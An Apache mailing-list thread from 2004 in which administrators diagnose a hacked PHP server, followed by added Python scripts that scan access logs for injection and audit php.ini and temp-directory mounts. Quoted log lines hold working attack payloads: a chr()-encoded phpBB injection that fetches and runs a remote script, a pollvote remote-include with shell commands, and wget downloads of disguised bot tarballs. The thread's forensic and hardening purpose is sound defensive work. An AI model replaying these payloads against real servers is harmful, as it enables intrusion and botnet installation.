Posted to users@httpd.apache.org by Arthur Kerpician <ar...@bluechip.ro> on 2004/12/04 00:05:42 UTC

[users@httpd] Security issue with 2.0.50

Hi all,
A few days ago I noticed a problem which I hadn't encountered in over 2 
years of using Apache! On my Apache 2.0.50 / mod_ssl / PHP 4.3.8 server 
someone could write in my /tmp directory (or download files, as you can 
see from the logs below) and execute processes under commonly used names 
(qmail-remote, httpd etc). Most of these processes opened remote 
connections on port 6667 and, as I further saw, were used for a psybnc 
(which I really don't know what it does, except that it is used on IRC).
This is a part from the error_log:
------------------------------------------------------------------------------------------
[Tue Nov 30 11:13:09 2004] [notice] Apache/2.0.50 (Unix) mod_ssl/2.0.50 
OpenSSL/0.9.7a PHP/4.3.8 configured -- resuming normal
sh: line 1: a.html: Permission denied
sh: line 1: a.html: Permission denied
--11:38:45--  http://security.cnc.net/bind.tgz
           => `bind.tgz'
Resolving security.cnc.net... done.
Connecting to security.cnc.net[207.155.252.37]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
11:38:46 ERROR 404: Not Found.

mkdir: cannot create directory `.a': File exists
--11:38:46--  http://security.cnc.net/bind.tgz
           => `bind.tgz'
Resolving security.cnc.net... done.
Connecting to security.cnc.net[207.155.252.70]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
11:38:47 ERROR 404: Not Found.

--22:56:25--  http://www.security.cnc.net/qmail.tgz
           => `qmail.tgz'
Resolving www.security.cnc.net... done.
Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 211,097 [application/x-compressed]

    0K .......... .......... .......... .......... .......... 24%   
46.82 KB/s
   50K .......... .......... .......... .......... .......... 48%   
77.16 KB/s
  100K .......... .......... .......... .......... .......... 72%   
62.27 KB/s
  150K .......... .......... .......... .......... .......... 97%   
75.30 KB/s
  200K ......                                                100%  
192.17 KB/s

22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
------------------------------------------------------------------------------------------

Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until now 
everything's OK, but if somebody can explain what I experienced I'd 
be grateful. I read on some sites about a worm exploiting a 
vulnerability in OpenSSL but I'm not sure if that's the case.

Thanks for any replies,
Arthur


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] Security issue with 2.0.50

Posted by Shannon Eric Peevey <sp...@unt.edu>.
Arthur Kerpician wrote:

>>
> I got to the bottom of it and this is what I had found:
> forum.protected.com-access_log:200.140.216.79 - - 
> [04/Dec/2004:06:55:54 +0200] "GET 
> /viewtopic.php?t=139&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252echr(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%252echr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527 
> HTTP/1.0" 200 13994
>
> It seems that the gateway for my server's vulnerability was 
> phpBB-2.0.4. If you convert the ASCII codes in the URL to chars it will 
> give you this:
> echo uncomeco;cd /var/tmp;wget http://hoob.webcindario.com/bla..bla...
> Eric, you were right by giving me the example with pollvote...that 
> made me look into all sites' logs hosted on that server. The forum was 
> the only site which recorded this kind of request (I did a `grep 
> echr /www/logs/*access_log*` on all access logs). There were several 
> records like the one above with IPs coming from Brazil, Dominican 
> Republic, Spain, Germany, AOL...I guess untraceable proxies.
>
> I upgraded today to phpBB-2.0.11, the latest stable release tagged by 
> the authors as "critical update". Thanks all for your fast replies, 
> I'll keep posting on the subject if the matter isn't solved.
>
Arthur,

Great!!  Yeah, there are all kinds of SQL injection issues in 
phpBB-2.0.10, so it's good you have 2.0.11 installed now.  I know this is 
an Apache list, but I should follow this up with the location of the patch 
for anyone that is not able to upgrade to phpBB-2.0.11 yet:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

Ivan, if you see how phpBB2 is dealing with safe_mode=On, they have you 
create a tmp dir under the bulletin board root chmod'd to 777...  Your 
guess is as good as mine as to the actual security of this fix.  It 
seems to me that safe_mode is still largely ignored by many PHP 
application developers (photo galleries in particular), so it might not 
be feasible to run your application in safe_mode.  I didn't explore the 
exact vulnerability in pollvote.php, but I assume it must be a weakness 
in form validation. 

see ya'll,

-- 
Shannon Eric Peevey                     =>  "speeves"
Dyno-Mite! System Administrator         =>  speeves@unt.edu
Central Web Support                     =>  (940) 369-8876
University of North Texas               =>  http://web2.unt.edu





Re: [users@httpd] Security issue with 2.0.50

Posted by Arthur Kerpician <ar...@bluechip.ro>.
Shannon Eric Peevey wrote:

>
>>> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>>>           => `qmail.tgz'
>>> Resolving www.security.cnc.net... done.
>>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>>> HTTP request sent, awaiting response... 200 OK
>>> Length: 211,097 [application/x-compressed]
>>>
>>>    0K .......... .......... .......... .......... .......... 24%   
>>> 46.82 KB/s
>>>   50K .......... .......... .......... .......... .......... 48%   
>>> 77.16 KB/s
>>>  100K .......... .......... .......... .......... .......... 72%   
>>> 62.27 KB/s
>>>  150K .......... .......... .......... .......... .......... 97%   
>>> 75.30 KB/s
>>>  200K ......                                                100%  
>>> 192.17 KB/s
>>>
>>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>> ------------------------------------------------------------------------------------------ 
>>>
>>>
>>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until 
>>> now everything's OK, but if somebody can explain what I 
>>> experienced I'd be grateful. I read on some sites about a worm 
>>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the 
>>> case.
>>
>>
> I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
>
> http://www.energymech.net/
>
> It seems like IRC bots, bombs, etc., are about the most popular uses 
> for these types of hacks.
> First, I would rebuild the machine,  (After you do some forensic 
> analysis, of course :) ).  I agree with Ivan on this, though it could 
> also be safe_mode=off, or php 4.3.8 was also vulnerable to a file 
> upload vulnerability:
>
> http://securityfocus.net/bid/11190/info/
>
> I would look through your apache logs for shell commands, such as 
> wget, ls, etc., and you might be able to trace the exact vulnerability 
> that these people used.  Here is an example from a machine that was 
> exploited with a safe_mode=off exploit:
>
> access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET 
> /pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a 
> HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
> 5.1)" 1101/3049 (36%)
>
> You'll notice the commands after 'cmd='.  (Exploiting a file in the 
> pollvote application).
>
> Let me know what you find.  (Contact me offlist, if you would like 
> some help).
>
> thanks,
>
I got to the bottom of it and this is what I had found:
forum.protected.com-access_log:200.140.216.79 - - [04/Dec/2004:06:55:54 
+0200] "GET 
/viewtopic.php?t=139&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252echr(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%252echr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527 
HTTP/1.0" 200 13994

It seems that the gateway for my server's vulnerability was phpBB-2.0.4. 
If you convert the ASCII codes in the URL to chars it will give you this:
echo uncomeco;cd /var/tmp;wget http://hoob.webcindario.com/bla..bla...
Eric, you were right by giving me the example with pollvote...that made 
me look into all sites' logs hosted on that server. The forum was the 
only site which recorded this kind of request (I did a `grep 
echr /www/logs/*access_log*` on all access logs). There were several 
records like the one above with IPs coming from Brazil, Dominican 
Republic, Spain, Germany, AOL...I guess untraceable proxies.

I upgraded today to phpBB-2.0.11, the latest stable release tagged by 
the authors as "critical update". Thanks all for your fast replies, I'll 
keep posting on the subject if the matter isn't solved.




Re: [users@httpd] Security issue with 2.0.50

Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
Hi

Glad we agree :P

Following the safe_mode = off issue: a friend of mine is using some 
kind of "online shop service" (don't know which one), and whenever we try 
to put safe_mode=on the shop says that it can't access the tmp dir (/tmp) to 
use sessions and other stuff.
I tried creating and configuring a user-local tmp dir, with no luck 
(obviously modifying the source code).
I think this is a coding problem, but he doesn't want to recode the system 
(typical user excuse: "it worked before"). Any hints?

Well, any pointers will be well received :)

Be excellent to each other!!

Shannon Eric Peevey wrote:
> 
>>> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>>>           => `qmail.tgz'
>>> Resolving www.security.cnc.net... done.
>>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>>> HTTP request sent, awaiting response... 200 OK
>>> Length: 211,097 [application/x-compressed]
>>>
>>>    0K .......... .......... .......... .......... .......... 24%   
>>> 46.82 KB/s
>>>   50K .......... .......... .......... .......... .......... 48%   
>>> 77.16 KB/s
>>>  100K .......... .......... .......... .......... .......... 72%   
>>> 62.27 KB/s
>>>  150K .......... .......... .......... .......... .......... 97%   
>>> 75.30 KB/s
>>>  200K ......                                                100%  
>>> 192.17 KB/s
>>>
>>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>>> ------------------------------------------------------------------------------------------ 
>>>
>>>
>>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until 
>>> now everything's OK, but if somebody can explain what I 
>>> experienced I'd be grateful. I read on some sites about a worm 
>>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the 
>>> case.
>>
>>
> I downloaded the qmail.tgz, and it is really EnergyMech in disguise:
> 
> http://www.energymech.net/
> 
> It seems like IRC bots, bombs, etc., are about the most popular uses for 
> these types of hacks.
> First, I would rebuild the machine,  (After you do some forensic 
> analysis, of course :) ).  I agree with Ivan on this, though it could 
> also be safe_mode=off, or php 4.3.8 was also vulnerable to a file upload 
> vulnerability:
> 
> http://securityfocus.net/bid/11190/info/
> 
> I would look through your apache logs for shell commands, such as wget, 
> ls, etc., and you might be able to trace the exact vulnerability that 
> these people used.  Here is an example from a machine that was exploited 
> with a safe_mode=off exploit:
> 
> access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET 
> /pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a 
> HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
> 5.1)" 1101/3049 (36%)
> 
> You'll notice the commands after 'cmd='.  (Exploiting a file in the 
> pollvote application).
> 
> Let me know what you find.  (Contact me offlist, if you would like some 
> help).
> 
> thanks,
> 



Re: [users@httpd] Security issue with 2.0.50

Posted by Shannon Eric Peevey <sp...@unt.edu>.
>> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>>           => `qmail.tgz'
>> Resolving www.security.cnc.net... done.
>> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
>> HTTP request sent, awaiting response... 200 OK
>> Length: 211,097 [application/x-compressed]
>>
>>    0K .......... .......... .......... .......... .......... 24%   
>> 46.82 KB/s
>>   50K .......... .......... .......... .......... .......... 48%   
>> 77.16 KB/s
>>  100K .......... .......... .......... .......... .......... 72%   
>> 62.27 KB/s
>>  150K .......... .......... .......... .......... .......... 97%   
>> 75.30 KB/s
>>  200K ......                                                100%  
>> 192.17 KB/s
>>
>> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
>> ------------------------------------------------------------------------------------------ 
>>
>>
>> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until 
>> now everything's OK, but if somebody can explain what I 
>> experienced I'd be grateful. I read on some sites about a worm 
>> exploiting a vulnerability in OpenSSL but I'm not sure if that's the 
>> case.
>
I downloaded the qmail.tgz, and it is really EnergyMech in disguise:

http://www.energymech.net/

It seems like IRC bots, bombs, etc., are about the most popular uses for 
these types of hacks. 

First, I would rebuild the machine,  (After you do some forensic 
analysis, of course :) ).  I agree with Ivan on this, though it could 
also be safe_mode=off, or php 4.3.8 was also vulnerable to a file upload 
vulnerability:

http://securityfocus.net/bid/11190/info/

I would look through your apache logs for shell commands, such as wget, 
ls, etc., and you might be able to trace the exact vulnerability that 
these people used.  Here is an example from a machine that was exploited 
with a safe_mode=off exploit:

access_log:68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET 
/pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a 
HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1)" 1101/3049 (36%)

You'll notice the commands after 'cmd='.  (Exploiting a file in the 
pollvote application).

Let me know what you find.  (Contact me offlist, if you would like some 
help).

thanks,

-- 
Shannon Eric Peevey                     =>  "speeves"
Dyno-Mite! System Administrator         =>  speeves@unt.edu
Central Web Support                     =>  (940) 369-8876
University of North Texas               =>  http://web2.unt.edu


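The log check Shannon describes above (look through the access logs for shell commands such as wget, uname or id) and the decoding Arthur did by hand in his follow-up (converting the chr() codes in the phpBB highlight request back into the command) can be done in one pass over the logs. The script below is an added example for this thread, not code from the posts, from phpBB or from pollvote. It parses access_log lines (including grep output with a file-name prefix), percent-decodes query values until they stop changing so the double-encoded %2527/%252e payload comes out in clear, rebuilds chr() chains into the string PHP would have passed to system(), and flags command-style parameters and remote URLs passed as parameter values. The sample log is constructed from the two requests quoted in the thread plus one benign request; the list of command parameter names is an assumption to be extended for the applications you host.

```python
"""Scan Apache access_log lines for the PHP injection patterns seen in this thread.

Added example, not code from the posts, from phpBB or from pollvote. It does
what Shannon suggested (look for shell commands in the logs) and what Arthur
did by hand (turn the chr()-encoded highlight payload back into the command).
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the two requests quoted in the thread (the first is grep
# output, so it carries a "file:" prefix) plus one benign request to ignore.
SAMPLE_LOG = """\
forum.protected.com-access_log:200.140.216.79 - - [04/Dec/2004:06:55:54 +0200] "GET /viewtopic.php?t=139&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252echr(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%252echr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527 HTTP/1.0" 200 13994
68.223.190.5 - - [29/Oct/2004:10:20:08 -0500] "GET /pollvote/pollvote.php?pollname=http://www.ka0ticl4b.hpgvip.com.br/cse.jpg?&cmd=id;uname%20-a HTTP/1.1" 200 1119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 1101/3049 (36%)
10.0.0.7 - - [04/Dec/2004:07:01:12 +0200] "GET /viewtopic.php?t=139&highlight=apache HTTP/1.1" 200 13994
"""

LOG_RE = re.compile(
    r"^(?:\S+?:)?"                                   # optional file name from grep
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ "
    r"\[(?P<time>[^\]]+)\] "
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r"(?P<status>\d{3})"
)
CHR_RE = re.compile(r"chr\((\d{1,3})\)")
PHP_EXEC_RE = re.compile(r"\b(?:system|passthru|exec|shell_exec|popen|eval)\s*\(")
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)
# Parameter names commonly used to pass a command to an injected shell;
# an assumption, extend it for the applications you host.
CMD_PARAMS = {"cmd", "c", "command", "exec", "shell"}


def full_unquote(value, rounds=3):
    """Percent-decode until the text stops changing: %2527 -> %27 -> '."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_chr_chain(text):
    """Rebuild the string PHP would have built from chr(101).chr(99)... ."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(text) if int(n) < 256)


def binaries_in(command):
    """First word of each ;-, |- or &-separated shell command."""
    return re.findall(r"(?:^|[;|&])\s*([A-Za-z_][\w.-]*)", command)


def query_params(target):
    """Yield decoded (key, value) pairs. Split on '&' only: a ';' in the
    value is part of the injected shell command, not a separator."""
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            yield full_unquote(key), full_unquote(value)


def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings, command = [], None
    for key, value in query_params(m.group("target")):
        if key.lower() in CMD_PARAMS and value:
            findings.append(f"command passed in parameter {key!r}")
            command = command or value
        if REMOTE_RE.match(value):
            findings.append(f"remote URL in parameter {key!r} (remote file include)")
        if PHP_EXEC_RE.search(value):
            findings.append(f"PHP execution function in parameter {key!r}")
        if len(CHR_RE.findall(value)) >= 3:
            command = decode_chr_chain(value)
            findings.append(f"chr()-encoded string in parameter {key!r}")
    if not findings:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "path": urlsplit(m.group("target")).path,
        "findings": findings,
        "command": command,
        "binaries": binaries_in(command) if command else [],
    }


def scan_log(text):
    """Scan every line of an access_log; hits come back in file order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['time']} {hit['path']}")
        for finding in hit["findings"]:
            print("   ", finding)
        if hit["command"]:
            print("    command: ", hit["command"])
            print("    binaries:", ", ".join(hit["binaries"]))
```

Feed scan_log() the contents of each access_log (or the output of the grep Arthur ran) and it reports, per hit, the source address, the script that was hit, what made the request suspicious, and the reconstructed command with the binaries it calls. Grepping for single words such as `id` or `ls` produces noise; matching on the decoded form of the parameters, as done here, is what separates the pollvote `cmd=` request and the chr() chain from ordinary forum traffic.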


Re: [users@httpd] Security issue with 2.0.50

Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
That's not Apache (I'm pretty sure...). That's an insecure PHP setup 
(register_globals on, probably) and someone used a "code injection" on you.
PHP-Nuke's mods usually are vulnerable to that.

After the code injection, the script kiddie needs a place to put, 
uncompress and run the software he uploaded... usually /tmp, /var/tmp, 
/dev/shm, etc.
How to secure this?
In php.ini register_globals MUST be off. /tmp should not be able to exec 
stuff (I usually link /var/tmp and /usr/tmp to /tmp, and mount /tmp as 
noexec).

I may be wrong about it being PHP, but that's how they run software on your machine.



Arthur Kerpician wrote:
> Hi all,
> A few days ago I noticed a problem which I hadn't encountered in over 2 
> years of using Apache! On my Apache 2.0.50 / mod_ssl / PHP 4.3.8 server 
> someone could write in my /tmp directory (or download files, as you can 
> see from the logs below) and execute processes under commonly used names 
> (qmail-remote, httpd etc). Most of these processes opened remote 
> connections on port 6667 and, as I further saw, were used for a psybnc 
> (which I really don't know what it does, except that it is used on IRC).
> This is a part from the error_log:
> ------------------------------------------------------------------------------------------ 
> 
> [Tue Nov 30 11:13:09 2004] [notice] Apache/2.0.50 (Unix) mod_ssl/2.0.50 
> OpenSSL/0.9.7a PHP/4.3.8 configured -- resuming normal
> sh: line 1: a.html: Permission denied
> sh: line 1: a.html: Permission denied
> --11:38:45--  http://security.cnc.net/bind.tgz
>           => `bind.tgz'
> Resolving security.cnc.net... done.
> Connecting to security.cnc.net[207.155.252.37]:80... connected.
> HTTP request sent, awaiting response... 404 Not Found
> 11:38:46 ERROR 404: Not Found.
> 
> mkdir: cannot create directory `.a': File exists
> --11:38:46--  http://security.cnc.net/bind.tgz
>           => `bind.tgz'
> Resolving security.cnc.net... done.
> Connecting to security.cnc.net[207.155.252.70]:80... connected.
> HTTP request sent, awaiting response... 404 Not Found
> 11:38:47 ERROR 404: Not Found.
> 
> --22:56:25--  http://www.security.cnc.net/qmail.tgz
>           => `qmail.tgz'
> Resolving www.security.cnc.net... done.
> Connecting to www.security.cnc.net[207.155.248.45]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 211,097 [application/x-compressed]
> 
>    0K .......... .......... .......... .......... .......... 24%   46.82 
> KB/s
>   50K .......... .......... .......... .......... .......... 48%   77.16 
> KB/s
>  100K .......... .......... .......... .......... .......... 72%   62.27 
> KB/s
>  150K .......... .......... .......... .......... .......... 97%   75.30 
> KB/s
>  200K ......                                                100%  192.17 
> KB/s
> 
> 22:56:29 (64.12 KB/s) - `qmail.tgz' saved [211097/211097]
> ------------------------------------------------------------------------------------------ 
> 
> 
> Today I upgraded to 2.0.52 and re-checked my httpd.conf file. Until now 
> everything's OK, but if somebody can explain what I experienced I'd 
> be grateful. I read on some sites about a worm exploiting a 
> vulnerability in OpenSSL but I'm not sure if that's the case.
> 
> Thanks for any replies,
> Arthur
> 
> 
> 

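Ivan's two host-level controls above (register_globals off in php.ini; /var/tmp and /usr/tmp linked to /tmp and /tmp mounted noexec) are easy to state and easy to get subtly wrong, so they are worth checking rather than assuming. The script below is an added example, not code from the posts or from PHP: it parses php.ini text and /proc/mounts text, follows a symlink table for the drop directories Ivan lists, and reports where either control is missing. The php.ini contents, mount tables and symlink map are constructed samples showing a weak host beside a hardened one; on a real host pass the actual file contents and resolve links with os.path.realpath.

```python
"""Audit the two controls Ivan recommends: register_globals = Off in php.ini,
and the temp directories an intruder drops files into mounted noexec.

Added example, not code from the posts or from PHP. The ini, mount and symlink
data below are constructed samples; feed audit() open("/etc/php.ini").read()
and open("/proc/mounts").read() to check a live host.
"""

# The drop zones Ivan lists. Assumption: the same set on the host being audited.
TMP_DIRS = ["/tmp", "/var/tmp", "/usr/tmp", "/dev/shm"]

WEAK_INI = """\
[PHP]
; constructed sample of a permissive 2004-era php.ini
register_globals = On
safe_mode = Off
"""
WEAK_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /var ext3 rw 0 0
"""
WEAK_LINKS = {}                       # no symlinks, every temp dir is a real dir

HARD_INI = """\
[PHP]
register_globals = Off
"""
HARD_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda2 /tmp ext3 rw,noexec,nosuid,nodev 0 0
tmpfs /dev/shm tmpfs rw,noexec,nosuid,nodev 0 0
"""
HARD_LINKS = {"/var/tmp": "/tmp", "/usr/tmp": "/tmp"}   # ln -s /tmp /var/tmp, etc.


def parse_php_ini(text):
    """directive -> value with lower-cased keys; ';' comments and [sections] skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip().lower()] = value.strip().strip('"')
    return conf


def ini_on(value):
    """The spellings PHP treats as true for a boolean directive."""
    return value.lower() in ("1", "on", "true", "yes")


def parse_mounts(text):
    """mount point -> set of options, from /proc/mounts (device point type opts ...)."""
    mounts = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4:
            mounts[parts[1]] = set(parts[3].split(","))
    return mounts


def resolve(path, links, limit=16):
    """Follow the symlink table (use os.path.realpath on a real host)."""
    for _ in range(limit):
        if path not in links:
            break
        path = links[path]
    return path


def mount_for(path, mounts):
    """Longest mount point that is a prefix of path."""
    best = "/"
    for mp in mounts:
        if (path == mp or path.startswith(mp.rstrip("/") + "/")) and len(mp) > len(best):
            best = mp
    return best


def audit(ini_text, mounts_text, links):
    """Return human-readable findings; an empty list means both controls hold."""
    findings = []
    rg = parse_php_ini(ini_text).get("register_globals")
    if rg is None:
        findings.append("php.ini: register_globals not set explicitly (set it to Off)")
    elif ini_on(rg):
        findings.append(f"php.ini: register_globals = {rg} (must be Off)")
    mounts = parse_mounts(mounts_text)
    for d in TMP_DIRS:
        real = resolve(d, links)
        mp = mount_for(real, mounts)
        if "noexec" not in mounts.get(mp, set()):
            findings.append(f"{d} -> {real} lives on {mp}, mounted without noexec")
    return findings


if __name__ == "__main__":
    for label, args in (("weak", (WEAK_INI, WEAK_MOUNTS, WEAK_LINKS)),
                        ("hardened", (HARD_INI, HARD_MOUNTS, HARD_LINKS))):
        print(f"{label}:")
        for finding in audit(*args) or ["ok"]:
            print("   ", finding)
```

On the weak sample it reports register_globals and all four directories; on the hardened one it reports nothing, because the symlinks land on the noexec /tmp filesystem and /dev/shm carries the option itself. One caveat to keep in mind: noexec stops a dropped binary from being executed directly, but not a script handed to an interpreter that lives elsewhere (the command decoded from the phpBB request in this thread fetches a file into /var/tmp and runs it through perl), so treat the mount option as one layer alongside fixing the application and keeping PHP from spawning shells at all.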